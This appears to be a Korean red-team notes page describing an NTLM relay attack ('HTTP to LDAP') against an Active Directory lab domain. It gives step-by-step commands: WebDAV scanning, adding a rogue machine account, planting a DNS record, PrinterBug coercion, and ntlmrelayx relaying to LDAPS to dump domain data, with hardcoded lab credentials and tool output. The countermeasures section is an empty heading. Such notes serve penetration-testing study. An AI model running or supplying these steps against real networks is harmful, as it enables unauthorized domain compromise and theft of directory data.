HTTP to LDAP
1. Webdav 강제 인증
# 1. Webdav 확인
webclientservicescanner choi.local/low:'Password123!'@192.168.40.0/24
# 2. 공격자 머신 계정 생성
impacket-addcomputer choi.local/low:'Password123!' -dc-ip 192.168.40.150
[*] Successfully added machine account DESKTOP-405ONBSD$ with password MV6AVqCWU7vnChAVPH5RICbBtBzkJdbk.
# 3. 공격자 머신 계정의 DNS 엔트리 생성 - 공격자 서버의 IP 주소 지정 (192.168.40.132)
python3 dnstool.py -u choi.local\\'DESKTOP-405ONBSD$' -p 'MV6AVqCWU7vnChAVPH5RICbBtBzkJdbk' -a add -r relayx -d 192.168.40.132 ldaps://192.168.40.150
# 4. Webdav + Printerbug 강제 인증
python3 printerbug.py choi.local/low:'Password123!'@192.168.40.151 kali@80/choiredteam
# 5. ntlmrelayx 를 이용해 LDAP 정보 덤프
./ntlmrelayx.py -t ldaps://192.168.40.150 --no-da --no-acl -smb2support --remove-mic --no-validate-priv
[*] HTTPD(80): Authenticating against ldaps://192.168.40.150 as / SUCCEED
[*] Assuming relayed user has privileges to escalate a user via ACL attack
[*] Dumping domain info for first time
[*] Domain info dumped into lootdir!
# 6. 공격 완료 후 머신 계정 및 DNS 엔트리 삭제 - 도메인 관리자 권한 필요
impacket-addcomputer -delete choi.local/Administrator:'Password123!' -computer-name 'DESKTOP-405ONBSD$'
python3 dnstool.py -u choi.local\\'DESKTOP-405ONBSD$' -p 'MV6AVqCWU7vnChAVPH5RICbBtBzkJdbk' -a remove -r relayx -d 192.168.40.132 ldaps://192.168.40.1502. MITM6
대응 방안

MISC
레퍼런스
Last updated